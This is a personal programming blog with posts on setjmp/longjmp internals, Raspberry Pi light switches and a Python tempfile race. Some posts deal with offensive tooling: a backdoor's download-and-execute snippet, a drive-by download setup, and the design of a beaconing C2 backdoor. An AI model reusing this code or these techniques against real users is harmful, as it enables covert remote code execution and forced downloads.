Mark Mossberg’s Blog

Hacker Nonsense

Let’s Understand: setjmp()/longjmp()

Pretty recently I learned about setjmp() and longjmp(). They’re a neat pair of libc functions which allow you to save your program’s current execution context and resume it at an arbitrary point in the future (with some caveats [1]). If you’re wondering why this is particularly useful, to quote the manpage, one of their main use cases is “…for dealing with errors and interrupts encountered in a low-level subroutine of a program.” These functions can be used for more sophisticated error handling than simple error code return values.

I was curious how these functions worked, so I decided to take a look at musl libc’s implementation for x86. First, I’ll explain their interfaces and show an example usage program. Next, since this post isn’t aimed at the assembly wizard, I’ll cover some basics of x86 and Linux calling convention to provide some required background knowledge. Lastly, I’ll walk through the source, line by line.

Interfaces

int setjmp(jmp_buf env);

setjmp() takes a single argument of the opaque type jmp_buf, returns 0, and then execution continues normally. A jmp_buf is the structure in which setjmp() saves the calling execution context. We’ll examine it more closely later on.

void longjmp(jmp_buf env, int val);

longjmp() takes a jmp_buf and an int. The unusual aspect is that it never returns to its own caller. Instead, the program’s execution resumes as if the setjmp() call that filled in the jmp_buf had just returned, this time returning the given int value (unless it was 0, in which case setjmp() returns 1). This allows the user to jump back an arbitrary number of frames on the current call stack (presumably out of some deep routine which had an error). The return value allows the code following the setjmp() call to tell whether it got there from setjmp() itself or from a longjmp(), and proceed accordingly.

Here’s a simple example.

#include <setjmp.h>
#include <stdio.h>

void fancy_func(jmp_buf env);

int main(void) {
    jmp_buf env;
    int ret = setjmp(env);
    if (ret == 0) {
        puts("just returning from setjmp!");
        fancy_func(env);
    } else {
        puts("now returning from longjmp and exiting!");
    }
    return 0;
}

void fancy_func(jmp_buf env) {
    puts("doing fancy stuff");
    longjmp(env, 1);
}

Output:

$ ./main
just returning from setjmp!
doing fancy stuff
now returning from longjmp and exiting!

The above code creates a jmp_buf and calls setjmp(), saving the current execution context. Since setjmp() returns 0, the code follows the first branch, calling fancy_func() and forwarding on the jmp_buf. fancy_func() does some fancy stuff, then calls longjmp(), passing in the jmp_buf and 1. Execution resumes in main() as if setjmp() had just returned, so we arrive at the if statement again, except this time ret is 1 instead of 0, because we’re returning via longjmp(). Now the code follows the else path, which prints and exits. [2]

Background Knowledge

I’ve mentioned “execution context” a few times, but let’s make that a little more concrete. In this case, a program’s execution context can be defined by the state of the processor’s registers.

On x86, the relevant registers are the general purpose, index, and pointer registers.

General Purpose: eax, ebx, ecx, edx
Index:           esi, edi
Pointer:         ebp, esp, eip

ebx, ecx, edx, esi, and edi don’t have particularly special meaning here and can be thought of as arbitrary 32-bit storage locations. However, eax, ebp, esp, and eip are a little different.

  • eax is used for function return values (specified by the cdecl calling convention).
  • ebp, the frame pointer, contains a pointer to the start of the current stack frame.
  • esp, the stack pointer, contains a pointer to the top of the stack.
  • eip, the instruction pointer, contains a pointer to the next instruction to execute.

With this in mind, I initially thought that a jmp_buf would be an array of 9 ints or something, in order to hold each register.

As it happens, jmp_buf is instead declared as (link):

typedef struct __jmp_buf_tag {
    __jmp_buf __jb;
    unsigned long __fl;
    unsigned long __ss[128/sizeof(long)];
} jmp_buf[1];

And for x86, __jmp_buf is declared as (link):

typedef unsigned long __jmp_buf[6];

I had never seen this syntax of putting brackets at the end of a typedef, but after some searching I found out that the __jmp_buf declaration declares a fixed-size array of 6 unsigned longs, and the jmp_buf declaration declares an array of 1 struct __jmp_buf_tag. The reason for the array of 1 is so that the pointer semantics of arrays kick in: the array decays to a pointer when passed to a function, so the struct __jmp_buf_tag is effectively passed by reference in calls to setjmp()/longjmp() (as opposed to being copied).

Anyway, apparently my guess of 9 ints was incorrect, and it’s actually 6 (longs).
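
To put numbers on that, here is a small Python sketch that adds up the three fields of the struct shown above. Python is only being used as a calculator here, and jmp_buf_bytes is a name made up for illustration. It assumes every field is an unsigned long with no padding in between, and that the register area has 6 slots as it does on x86.

```python
def jmp_buf_bytes(sizeof_long):
    """Return (register area, whole struct) sizes in bytes (hypothetical helper)."""
    jb = 6 * sizeof_long                     # __jmp_buf __jb: 6 unsigned longs on x86
    fl = sizeof_long                         # unsigned long __fl
    ss = (128 // sizeof_long) * sizeof_long  # unsigned long __ss[128/sizeof(long)]
    return jb, jb + fl + ss


register_area, total = jmp_buf_bytes(4)  # 32-bit x86: sizeof(long) == 4
print(register_area, total)              # 24 156
```

So on 32-bit x86 the six saved registers occupy only the first 24 bytes of the structure. The remaining fields are not touched by the setjmp()/longjmp() code examined in this post.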

Before we can dig into the source to understand why this is, we need to understand what the state of the program stack is at the point setjmp() is called, and to do that, we need to understand which calling convention is being used. Since we assume x86 Linux, this will be cdecl. The relevant parts of cdecl for this case are:

  • arguments passed on the stack
  • integer values and memory addresses returned in eax (as mentioned above)
  • eax, ecx, edx are caller saved, the rest are callee saved

setjmp()’s code starts executing immediately after the caller’s call instruction, so at the point the first instruction of setjmp() executes, the stack looks something like this.

> high memory <
| ...                       |
| caller's caller saved eip |
| caller's caller saved ebp | < ebp
| caller stack var 1        | // caller's stack frame
| caller stack var 2        |
| caller stack var ...      |
| caller stack var n        |
| pointer to jmp_buf        | // argument to setjmp
| caller saved eip          | < esp
+---------------------------+ // setjmp's stack frame
> low memory <

(In this illustration, the stack grows down.)

At the top of the stack is the eip value that the call instruction pushed, i.e. where to return to after setjmp() finishes. Above that is the first and only argument, the pointer to the given jmp_buf. Lastly, above that is the caller’s stack frame. esp points to the top of the stack as usual, and ebp is still pointing to the start of the caller’s stack frame. Usually the first thing a function does is push ebp on the stack and set ebp to esp so that it points to the new stack frame (a.k.a. the prologue), but since setjmp() is such a minimal function, it doesn’t do this. Furthermore, since ebp is one of the registers that needs to be saved, setjmp() needs it to be unperturbed.

After setjmp() returns, the stack will look something like this:

> high memory <
| ...                       |
| caller's caller saved eip |
| caller's caller saved ebp | < ebp
| caller stack var 1        | // caller's stack frame
| caller stack var 2        |
| caller stack var ...      |
| caller stack var n        |
| pointer to jmp_buf        | < esp
+---------------------------+
> low memory <

It’s nearly identical, except that the saved eip has been popped off the stack and the processor is now executing the instruction after the caller’s call setjmp. esp has also been updated accordingly. This is the state of the program that setjmp() will need to record, and that longjmp() will restore.

Before reading the source I tried to reason about what I expected would happen. I presumed:

  • General purpose and index registers (eax, ebx, ecx, edx, esi, edi) which don’t have any effect on control flow can be trivially saved and restored
  • ebp can similarly be saved “as is”, since its value when setjmp() executes is exactly what it needs to be restored to in longjmp()
  • esp cannot be saved “as is” because when setjmp() executes, there is the extra eip on the stack that is not there after the function returns. Therefore, the value for esp that should be saved is esp+4 to match the expected state of the stack after return
  • The eip that should be saved is the address of the instruction after the call setjmp instruction, which can be retrieved from the top of the stack by dereferencing esp

With all that out of the way, let’s read the source (all annotations by me) (link). Since this type of low level register manipulation isn’t available from C (modulo compiler intrinsics), both of these functions are necessarily written in assembly.

setjmp:
    mov 4(%esp), %eax     ; get pointer to jmp_buf, passed as argument on stack
    mov    %ebx, (%eax)   ; jmp_buf[0] = ebx
    mov    %esi, 4(%eax)  ; jmp_buf[1] = esi
    mov    %edi, 8(%eax)  ; jmp_buf[2] = edi
    mov    %ebp, 12(%eax) ; jmp_buf[3] = ebp
    lea 4(%esp), %ecx     ; get previous value of esp, before call
    mov    %ecx, 16(%eax) ; jmp_buf[4] = esp before call
    mov  (%esp), %ecx     ; get saved caller eip from top of stack
    mov    %ecx, 20(%eax) ; jmp_buf[5] = saved eip
    xor    %eax, %eax     ; eax = 0
    ret                   ; pop stack into eip

The first line retrieves the argument off the stack, placing a pointer to the jmp_buf (remember, an array of 6 unsigned longs) in eax. It then moves ebx, esi, edi, and ebp “as is” into the array. Next, it computes esp + 4 with a lea and stores that. Then it dereferences esp and stores the result (the return address) in the last slot in the array. Lastly, it zeroes out eax and returns.

The final state of the jmp_buf after setjmp() returns looks like:

   0    1    2    3    4    5
[ ebx, esi, edi, ebp, esp, eip ]
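
As a cross-check on the assembly, here is a toy Python model of what setjmp() stores. It is only a sketch: the register file is a dict, the stack is a dict from address to 32-bit word, and the function name and sample addresses are made up for illustration. The point is the two non-obvious slots. Slot 4 holds esp + 4 (the stack pointer as it will be once ret has popped the return address), and slot 5 holds the return address read from the top of the stack.

```python
def setjmp_model(regs, stack):
    """Return the six words the x86 setjmp above writes, in slot order (toy model)."""
    esp = regs["esp"]
    return [
        regs["ebx"],  # jmp_buf[0]
        regs["esi"],  # jmp_buf[1]
        regs["edi"],  # jmp_buf[2]
        regs["ebp"],  # jmp_buf[3]
        esp + 4,      # jmp_buf[4]: lea 4(%esp), %ecx
        stack[esp],   # jmp_buf[5]: mov (%esp), %ecx
    ]


# Made-up machine state at setjmp's first instruction.
regs = {"ebx": 1, "esi": 2, "edi": 3, "ebp": 0xFFFF1020, "esp": 0xFFFF1000}
stack = {
    0xFFFF1000: 0x08048ABC,  # return address pushed by the call instruction
    0xFFFF1004: 0x0804A040,  # argument: pointer to the jmp_buf
}

saved = setjmp_model(regs, stack)
print([hex(word) for word in saved])
```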

Now let’s look at longjmp() (link).

longjmp:
    mov  4(%esp),%edx ; get pointer to jmp_buf, passed as argument 1 on stack
    mov  8(%esp),%eax ; get int val in eax, passed as argument 2 on stack
    test    %eax,%eax ; is int val == 0?
    jnz 1f
    inc     %eax      ; if so, eax++
1:
    mov   (%edx),%ebx ; ebx = jmp_buf[0]
    mov  4(%edx),%esi ; esi = jmp_buf[1]
    mov  8(%edx),%edi ; edi = jmp_buf[2]
    mov 12(%edx),%ebp ; ebp = jmp_buf[3]
    mov 16(%edx),%ecx ; ecx = jmp_buf[4]
    mov     %ecx,%esp ; esp = ecx
    mov 20(%edx),%ecx ; ecx = jmp_buf[5]
    jmp *%ecx         ; eip = ecx

The first two lines retrieve the arguments (pointer to jmp_buf, int return val) from the stack into edx and eax, respectively. The int val is incremented to 1 if it is 0, according to the spec. Next, ebx, esi, edi, and ebp are reset to their saved state, stored in the jmp_buf, in a straightforward manner. As you can see, both setjmp() and longjmp() need to precisely agree on where each particular register is saved in the jmp_buf. esp is mysteriously restored in an indirect manner, via ecx [3], and finally, eip is reset to the saved state via an indirect jump.
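
The walkthrough above can also be written as a toy model in Python. This is a sketch with made-up names and sample values, not anything taken from musl: it takes the six saved words plus val and returns the register state the processor ends up in. Note the special case for a val of 0, and that eax carries what the caller sees as setjmp()’s return value.

```python
def longjmp_model(jmp_buf, val):
    """Return the register state after the x86 longjmp above jumps (toy model)."""
    eax = val if val != 0 else 1  # test/jnz/inc: a val of 0 becomes 1
    ebx, esi, edi, ebp, esp, eip = jmp_buf
    return {
        "eax": eax,
        "ebx": ebx,
        "esi": esi,
        "edi": edi,
        "ebp": ebp,
        "esp": esp,  # saved as esp + 4, so no return address is left on the stack
        "eip": eip,  # jmp *%ecx: continue right after the original call
    }


saved = [1, 2, 3, 0xFFFF1020, 0xFFFF1004, 0x08048ABC]  # sample values only

assert longjmp_model(saved, 5)["eax"] == 5
assert longjmp_model(saved, 0)["eax"] == 1
assert longjmp_model(saved, 0)["eip"] == 0x08048ABC
```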

So I was mostly correct, but it seems like eax, ecx, and edx were not saved in the jmp_buf! If we look back on the details of cdecl, it becomes clear why.

  • eax doesn’t need to be saved, because it is reserved for the return value
  • ecx and edx are caller saved. This means that a callee subroutine is free to trash these registers, and it is the responsibility of the caller to save and restore them around the call. Because of this, if the function that calls setjmp() needs to use ecx or edx after the call, it will already have code to save and restore those registers before and after the function call. Since longjmp() resumes execution as if setjmp() had immediately returned, execution will automatically hit the code that restores ecx and edx, making it unnecessary to save them in the jmp_buf.

This is just one example of how great musl libc is at providing an understandable resource for learning the internals of systems software. I often find myself referencing it when I’m curious about libc internals, and if you’re not familiar with it, I highly recommend checking it out!


  1. Mainly, that the function which called setjmp() cannot have returned before the corresponding longjmp() call.

  2. A slight aside: This situation where a function returns different values based on the execution context also appears in fork(), in which the caller uses the return value to differentiate whether it is now executing in the child or parent process.

  3. I actually have no good explanation for this and am pretty curious why it’s done this way. Something like mov 16(%edx), %esp (mov esp, [edx+16] in Intel syntax) is a perfectly valid instruction (tested with rasm2)! I asked on the musl mailing list, but no one responded :(. If you have an explanation, please let me know!

Building a Simple IoT Light Switch, Pt. 2

This is a pretty late post, but I wanted to show off the hardware I designed as a follow up to the first “Building a Simple IoT Light Switch”. In that post I presented a prototype of a smart light switch I designed that consisted of a button which triggered a small Python server running on a Raspberry Pi to control my Philips Hue lights over an HTTP API. It was an extraordinarily simple design that worked well enough; however, it was very inconvenient to transport since I had to rewire the breadboard to the raspi GPIO pins every time I moved. Since it seemed production ready for my needs, I decided to solve this problem by using this as an opportunity to learn PCB design and actually design a production board.

Special thanks go to Nick Kubasti for teaching me how to use KiCad and to John Sullivan for helping me with the final lab work.

The basic circuit I designed is below. It is merely a GPIO pin hooked up to ground with a switch in between, and an LED and resistor for fun.

The code behind this configures the GPIO pin to use a pull up resistor, which pulls the pin’s voltage up to VCC when the button is not pressed, and down to GND when it is. This lets the code poll for when the pin’s value is False. A more complete schematic including the pull up resistor is below. Note that I won’t have to implement the pull up part in my design because the Raspberry Pi implements that internally.

My initial idea was to have a little board that would plug straight down into the Pi’s GPIO male headers with a little button and LED at the end. However, that was really wasteful since that would block all of the pins even though I was only using three of them (input, GND, VCC). Nick suggested a board design that had two sets of headers: one set of female ones for plugging downwards as I had originally thought, and one set of male ones facing upward that all the unused pins would be forwarded to. This way, even though the downward facing female pins are all plugged in, they can all still be accessed since the board traces simply connect the unused female pins to the corresponding male ones. The exception to this is GPIO pin 11, which is the one actually being used for the switch. I just need to remember for future projects that pin 11 is reserved. That was probably really hard to understand, so here’s the schematic, created with KiCad.

On the left you can see the two sets of 13 x 2 headers. The ones on the left will be the female ones that plug downward into the Pi’s male headers. The ones on the right will be the male ones that can be used for other projects. All those wires going around the top and bottom are the forwarded connections. The one pin exclusively in use on the left is pin 11, which is connected to the circuit. All the rest are unused, and wires are used to connect them to their corresponding male header. Pins 1 and 9 are technically in use, but since they correspond to VCC and GND, it’s fine to forward them too.

The actual circuit is in the bottom left. It’s very similar to the above circuit diagrams: pin 11 is connected to GND (pin 9) via a switch, and 3.3V VCC (pin 1) is connected to an LED, a resistor, and the same GND (pin 9).

The next step after creating the schematic, and assigning actual parts to each of the components, was to design the printed circuit board (PCB). This involves laying out the components as they will appear on the physical board.

This was a completely new area to me and it was challenging and fun to actually draw out the board’s traces, taking care not to intersect them, and using the different layers when necessary. You might notice that there’s a seemingly random set of 1 x 2 headers in the middle of the area where the switch goes. I added those because I noticed that the button and LED were going to actually extend off the end of the Pi. I was concerned about how pressing down on the button would actually flip the Pi a little bit, so Nick had an incredible idea and suggested adding space for a pair of dud headers that could be used as legs to support the end of the PCB that hung off the side of the Pi.

After this, I was then able to pretty easily use KiCad to generate some Gerber files to send to the fab. I chose to use OshPark based on Nick’s recommendation, and they turned out to be a great option. I was able to get three copies of my board, with free shipping for <$8!

After waiting a couple of weeks for the boards to come in, John helped me solder everything together to finish up this project. During this process we noticed one design mistake: the layout of the switch was actually way too big for the switch we had on hand, but that didn’t turn out to be a serious issue.

Here are some pictures of the final product:

Here’s a video of it in action:

A video posted by Mark Mossberg (@mssbrg) on

Thanks for reading! I have two extra boards I’m not doing anything with, so if you happen to have a Raspberry Pi and some Hue lights, I’d be happy to give you the hardware and software for your own DIY light switch.

Off to the (Python Internals) Races

This post is about an interesting race condition bug I ran into a while ago while working on a small feature improvement for poet.

In particular, I was improving the download-and-execute capability of poet which, if you couldn’t tell, downloads a file from the internet and executes it on the target. At the original time of writing, I didn’t know about the Python tempfile module, and since I recently learned about it, I wanted to integrate it into poet as it would be a significant improvement to the original implementation. The initial patch looked like this.

import os
import stat
import subprocess as sp
import tempfile
import urllib2

r = urllib2.urlopen(inp.split()[1])
with tempfile.NamedTemporaryFile() as f:
    f.write(r.read())
    os.fchmod(f.fileno(), stat.S_IRWXU)
    f.flush()  # ensure that file was actually written to disk
    sp.Popen(f.name, stdout=open(os.devnull, 'w'), stderr=sp.STDOUT)

This code downloads a file from the internet, writes it to a tempfile on disk, sets the permissions to executable, and executes it in a subprocess. In testing this code, I observed some puzzling behavior: the file was never actually getting executed because it was suddenly ceasing to exist! I noticed, though, that when I used subprocess.call() or called .wait() on the Popen object, it would work fine. However, I intentionally didn’t want the client to block while the file executed its arbitrary payload, so I couldn’t use those functions.

The fact that the execution would work when the Popen call waited for the process and didn’t work otherwise suggests that there was something going on between the time it took to execute the child and the time it took for the with block to end and delete the file, which is tempfile’s default behavior. More specifically, the file must have been deleted at some point before the exec syscall loaded the file from disk into memory. Let’s take a look at the implementation of subprocess.Popen() to see if we can gain some more insight:

def _execute_child(self, args, executable, preexec_fn, close_fds,
                           cwd, env, universal_newlines,
                           startupinfo, creationflags, shell, to_close,
                           p2cread, p2cwrite,
                           c2pread, c2pwrite,
                           errread, errwrite):
            """Execute program (POSIX version)"""

            <snip>

            try:
                try:
                    <snip>
                    try:
                        self.pid = os.fork()
                    except:
                        if gc_was_enabled:
                            gc.enable()
                        raise
                    self._child_created = True
                    if self.pid == 0:
                        # Child
                        try:
                            # Close parent's pipe ends
                            if p2cwrite is not None:
                                os.close(p2cwrite)
                            if c2pread is not None:
                                os.close(c2pread)
                            if errread is not None:
                                os.close(errread)
                            os.close(errpipe_read)

                            # When duping fds, if there arises a situation
                            # where one of the fds is either 0, 1 or 2, it
                            # is possible that it is overwritten (#12607).
                            if c2pwrite == 0:
                                c2pwrite = os.dup(c2pwrite)
                            if errwrite == 0 or errwrite == 1:
                                errwrite = os.dup(errwrite)

                            # Dup fds for child
                            def _dup2(a, b):
                                # dup2() removes the CLOEXEC flag but
                                # we must do it ourselves if dup2()
                                # would be a no-op (issue #10806).
                                if a == b:
                                    self._set_cloexec_flag(a, False)
                                elif a is not None:
                                    os.dup2(a, b)
                            _dup2(p2cread, 0)
                            _dup2(c2pwrite, 1)
                            _dup2(errwrite, 2)

                            # Close pipe fds.  Make sure we don't close the
                            # same fd more than once, or standard fds.
                            closed = { None }
                            for fd in [p2cread, c2pwrite, errwrite]:
                                if fd not in closed and fd > 2:
                                    os.close(fd)
                                    closed.add(fd)

                            if cwd is not None:
                                os.chdir(cwd)

                            if preexec_fn:
                                preexec_fn()

                            # Close all other fds, if asked for - after
                            # preexec_fn(), which may open FDs.
                            if close_fds:
                                self._close_fds(but=errpipe_write)

                            if env is None:
                                os.execvp(executable, args)
                            else:
                                os.execvpe(executable, args, env)

                        except:
                            exc_type, exc_value, tb = sys.exc_info()
                            # Save the traceback and attach it to the exception object
                            exc_lines = traceback.format_exception(exc_type,
                                                                   exc_value,
                                                                   tb)
                            exc_value.child_traceback = ''.join(exc_lines)
                            os.write(errpipe_write, pickle.dumps(exc_value))

                        # This exitcode won't be reported to applications, so it
                        # really doesn't matter what we return.
                        os._exit(255)

                    # Parent
                    if gc_was_enabled:
                        gc.enable()
                finally:
                    # be sure the FD is closed no matter what
                    os.close(errpipe_write)

                # Wait for exec to fail or succeed; possibly raising exception
                # Exception limited to 1M
                data = _eintr_retry_call(os.read, errpipe_read, 1048576)

                <snip>

The _execute_child() function is called by the subprocess.Popen class constructor and implements child process execution. There’s a lot of code here, but key parts to notice here are the os.fork() call which creates the child process, and the relative lengths of the following if blocks. The check if self.pid == 0 contains the code for executing the child process and is significantly more involved than the code for handling the parent process.

From this, we can deduce that when the subprocess.Popen() call executes in my code, after forking, while the child is preparing to call os.execve, the parent simply returns, and immediately exits the with block. This automatically invokes the f.close() function which deletes the temp file. By the time the child calls os.execve, the file has been deleted on disk. Oops.

I fixed this by adding the delete=False argument to the NamedTemporaryFile constructor to suppress the auto-delete functionality. Of course this means that the downloaded files will have to be cleaned up manually, but this allows the client to not block when executing the file and have the code still be pretty clean.
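
For reference, here is a minimal sketch of that fix, written for Python 3 rather than the Python 2 that the patch above uses. The function name and the tiny shell script payload are made up for illustration, and it assumes a POSIX system where files in the temp directory can be executed. It also closes the file before spawning the child, which is a choice made in this sketch (some systems refuse to execute a file that is still open for writing) and not something the original patch did.

```python
import os
import stat
import subprocess
import tempfile


def spawn_from_bytes(payload):
    """Write payload to a temp file that is NOT auto-deleted, then run it without waiting."""
    with tempfile.NamedTemporaryFile(delete=False) as f:
        f.write(payload)
        f.flush()                            # make sure the bytes are in the file
        os.fchmod(f.fileno(), stat.S_IRWXU)  # owner read/write/execute
        path = f.name
    # Leaving the with block closed the file, but delete=False keeps it on disk,
    # so it no longer matters how long the child takes to reach exec.
    proc = subprocess.Popen([path], stdout=subprocess.DEVNULL,
                            stderr=subprocess.STDOUT)
    return proc, path


proc, path = spawn_from_bytes(b"#!/bin/sh\nexit 0\n")
print(os.path.exists(path))  # the file is still there after the with block
proc.wait()                  # only so this demo can clean up after itself
os.remove(path)
```

The manual os.remove() at the end is the cleanup cost mentioned above: with delete=False, nothing removes the file for you.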

Main takeaway here: don’t try to Popen a NamedTemporaryFile as the last statement in the tempfile’s with block.

Building a Sketchy Website 101

Back in April, I won a free “.club” domain through gandi.net’s anniversary prize giveaway. I really didn’t need a “.club” domain in particular, so I thought it would be pretty fun to register a stereotypical “sketchy” domain and set it up as a drive-by download site or something, because while I’ve heard of doing this kind of thing, I’ve never actually done it before. Here’s a blog post walking through what I did. The usual disclaimer applies here: I did this purely for my own education and learning experience and am not responsible for anything you do with it.

Step 1: Register your sketchy domain

I chose http://freemoviedownload.club.

Step 2: Set up drive-by downloads

This involves configuring your web server to automatically set the Content-Type header of the resource you want to force download to application/octet-stream. That should make most web browsers trigger a download file prompt to actually download the file. Safari curiously doesn’t support prompts for downloaded file location like Chrome and Firefox, so in that case, it will immediately download the file to ~/Downloads.

I’m going to try to force a drive-by download of a jpg file, so I added the below config to my .htaccess file in Apache’s DocumentRoot.

.htaccess
<Files *.jpg>
        ForceType application/octet-stream
</Files>

That will force browsers to download the image rather than render it when they try to access http://freemoviedownload.club/image.jpg, for example.

At this point, we’re technically done. We can send someone a link to a file and, assuming they say yes to the prompt (or use Safari), it will be downloaded to their computer. But for some extra polish, I want to have an actual website with content and have the download come from that page.

Step 3: Redirect

We can accomplish this with a trivial JavaScript redirect that executes after the page has loaded. We can even add a delay before the download happens to give visitors time to read the website or whatever. The redirect will need to be to the path configured in step 2, but this will give the illusion that the download is coming from the index.html page.

index.html
you have arrived at the official free movie download club! enjoy your download
<script type="text/javascript" charset="utf-8">
    function f() { document.location = 'dickbutt.jpg' }
    setTimeout(f, 2000);
</script>

That’s it! Anyone that browses to the website will automatically get a nice “dickbutt.jpg” image downloaded to their machine. Again, particularly effective against Safari and Chrome for Android, in my testing.

Building a Simple IoT Light Switch

I’m lucky enough to own a Philips Hue wireless lighting unit (thanks NUACM!) which essentially is this really awesome Internet of Things (IoT) product that lets me replace all my standard light bulbs with special RGB ones that can be controlled wirelessly. The bulbs communicate via ZigBee with a “Bridge” unit that is connected to my local network and hosts an HTTP API for interfacing with the lights. This API is used by the official Hue mobile app for controlling the lights, but is also publicly documented and totally hacker friendly. The lights are awesome, but it is a bit of a drag to have to use an app to turn them all off rather than having some physical switch [1], so I decided to fully embrace the IoT trend and use my Raspberry Pi to build a simple HTTP-fluent light switch for turning my lights on and off.

Hardware

The circuitry itself is literally as simple as it gets for this kind of thing: all I have is GPIO pin 11 on the board (BCM pin 17) connected to pin 6 (GND), with a switch in between. In my code, I’ll configure pin 17 to use an internal pull-up resistor, which will bring the voltage up to 3.3V when the button is not pressed and down to 0V when it is.

Software

The Raspberry Pi Python library makes it really easy to control circuits. For simplicity, my code uses a polling approach to detect when the button is pressed but the RPi library also supports real callbacks using threading.

def main():
    while True:
        inp = gpio.input(PIN)
        # pull up resistor will cause inp to be True when button is not
        # pressed and False when button is pressed
        if not inp:
            callback()
        time.sleep(BUTTON_SLEEP)
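
One thing to keep in mind with plain polling is that the loop reads the pin as False on every sample for as long as the button is held down. A common refinement is to react only to the transition from released to pressed. Here is a hedged sketch of that idea in Python 3. count_presses is a hypothetical helper, not part of the original script, and it works on a list of recorded samples so that it can run without a Pi attached.

```python
def count_presses(samples):
    """Count released-to-pressed transitions in a sequence of pin readings.

    With the pull-up enabled, True means released and False means pressed.
    """
    presses = 0
    previous = True  # assume the button starts out released
    for current in samples:
        if previous and not current:  # falling edge: the button was just pressed
            presses += 1
        previous = current
    return presses


# Two presses, each held for several polling intervals.
readings = [True, False, False, False, True, True, False, False, True]
print(count_presses(readings))  # 2
```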

My callback() function consists of code that uses the Hue API to request a diagnostic of the lights, which comes back as a JSON blob with each light represented as an object. If no lights are on, it turns them on, otherwise turning them all off. Turning the lights on and off is as simple as submitting a PUT request to the API endpoint for each light with a JSON blob specifying the state to turn to (On=True, Off=False).

def callback():
    survey = requests.get(BASE + '/lights')
    survey = json.loads(survey.text)
    numlights = len(survey)
    # if any are on, turn all off.
    if any([survey[str(x)]['state']['on'] for x in range(1, numlights+1)]):
        for light in survey.keys():
            turn(light, False)
        print '[{}] Off'.format(datetime.datetime.now())
    else:  # else if all are off, then all on
        for light in survey.keys():
            turn(light, True)
        print '[{}] On'.format(datetime.datetime.now())


def turn(light, state):
    data = json.dumps({'on':state})
    requests.put(BASE + '/lights/{}/state'.format(light), data=data)
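
The decision at the heart of callback() can be pulled out into a small pure function, which makes it easy to try without a Bridge on the network. This is a Python 3 sketch rather than the original code: next_state is a made-up name, and the sample dictionary only mimics the parts of the /lights response that the code above reads (each light id mapping to an object with a state containing on). Iterating over the values also avoids assuming that the light ids are exactly 1 through n.

```python
def next_state(survey):
    """Return the 'on' value to send to every light: off if any is on, else on."""
    any_on = any(light["state"]["on"] for light in survey.values())
    return not any_on


# Hand-written sample shaped like the fields callback() reads.
survey = {
    "1": {"state": {"on": False}},
    "2": {"state": {"on": True}},
    "4": {"state": {"on": False}},  # ids in this sample are deliberately not contiguous
}

print(next_state(survey))  # False: one light is on, so turn everything off
```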

That’s it! I leave the script running in a tmux pane on the Pi and I can hit the button at any point to toggle the lights on and off. The full code is available on GitHub.

For future work, it would be cool to integrate RF chips so the button wouldn’t have to be physically attached to the Pi and I could have a little remote control. I’ll leave that for another day. Thanks for reading, here it is in action!

A video posted by Mark Mossberg (@mssbrg) on


  1. Of course I could physically go to each light and flip the switch but manually turning off all three lights in my room is even more work than launching the app.

Poet: Beacon Based Post-Exploitation

Introduction

For the past eight months or so, I’ve been working sporadically on a side project of mine I call Poet. Poet is basically a tool for hackers that’s useful for post exploitation, that is, after you’ve initially exploited and gotten access to the computer you’re not supposed to have access to. Poet is useful because it essentially acts as a backdoor you can install into a system to help you maintain access once you’ve gotten your foot in the door.

As a disclaimer, I am building Poet purely for my own education and learning experience. The code is freely available because I think it might be useful to others interested in learning about this sort of thing. Use it responsibly.

I’ve learned a lot during the process of building this tool and I thought it would be cool to write a blog post (possibly more to come) documenting that process.

Motivation

The initial motivation for this project came from an experience I had participating in the 2014 Northeast Collegiate Cyber Defense Competition. In short, the competition requires a team of students to protect a small business IT infrastructure from a red team of hackers. Usually the red team is really good and completely owns you at some point or other throughout the competition, and at the end they tell you what they did and give you tips on how to improve. In particular, the red team told us that there was pre-installed “beaconing” malware on many of our systems from the start of the competition that would “phone home” to a command and control (C2) server every once in a while to get commands and tasks to execute on the target system. This idea was pretty interesting to me, and a basic implementation didn’t actually seem too hard to write, so I decided to give it a try, even though at this point, I had no experience with network programming.

v0.1

The first version of Poet was drastically different from the current form and was just about as simple and primitive as it gets for something like this. In this version, the client program (executed on target) would repeatedly attempt to connect to a socket (port 80 by default) on the server (attacker’s C2 server) at a specified interval. If the connection failed (server wasn’t running), the client would sleep, otherwise it would execute a command sent from the server, sending back the stdout of the command. The server simply maintained a queue of commands to execute and would one by one pop them off the queue and send them to the client, printing out the stdout when it came back. This was a great exercise to learn the basics of socket programming, but of course wasn’t very useful at all, for a number of reasons. First, ideally the client’s interval is very large so as to minimize network use and remain stealthy but that puts a hard limit on the rate at which commands can be executed. This system was also very inflexible because there was no way to reorder or edit commands in the queue, since the “user interface” was just a server script that was run with the commands to execute as arguments. Overall, a good start, but there was definitely much work ahead to actually make this a semi-realistic tool.

v0.2

The second version of Poet involved a pretty substantial redesign, although one thing that stayed the same was the high level client/server beaconing dynamic. This is far superior to having the client listen on the target’s end because in any sort of “real” scenario, the target will likely be behind a firewall that will reject incoming packets on arbitrary ports. The beaconing model allows the tool to bypass most standard firewalls that aren’t specifically targeting it because outbound port 80 traffic is almost certainly allowed. I later changed the default port to 443 because it’s just as likely to be allowed out and because it could potentially avoid packet inspection, since traffic on 443 is usually encrypted.

Building on this model, I brainstormed a few other ways to improve on v0.1. Instead of executing a single command for every ping, what about sending over multiple commands? What about a pastebin/gist URL to a script that the client would download and execute? These would help solve the rate limit problem because an arbitrary number of commands, instead of one, could be executed for each ping. What about the user interface? What about creating an actual web user interface for managing the command queue that the client was pulling from each ping? This would help solve the flexibility problem.

While these would be relatively simple to add to v0.1, if I asked myself, “If I were a hacker, would I want to use this tool?” the answer would be “No way!” because I would only be able to interact with my target system via discrete scripts, and I would have to wait the ideally large time interval between pings to get any sort of feedback on my actions.

This made it obvious that I would have to move from a design where each ping from the client was an opportunity for the user to run x actions on the target, to a design where each ping from the client was an opportunity for the user to interactively control the client for an unlimited time, and perform actions on the target with continuous feedback. With this in mind, I opted to use a shell as the user interface on the server side since it seemed simpler to implement and I was more familiar with implementing a shell versus something like a web interface (which would likely have to have a shell built into it anyway for executing commands). The server design would be similar to that of v0.1 in that the server would only be running when the user wanted to control the client, and the client would use the inability to connect to the server as a sign to “go to sleep” for another interval. Another server design I thought of was an always-on model where the server would always answer the client’s ping with some kind of binary state value. That would work equally well, but it isn’t strictly necessary because the state can be inferred as described above.

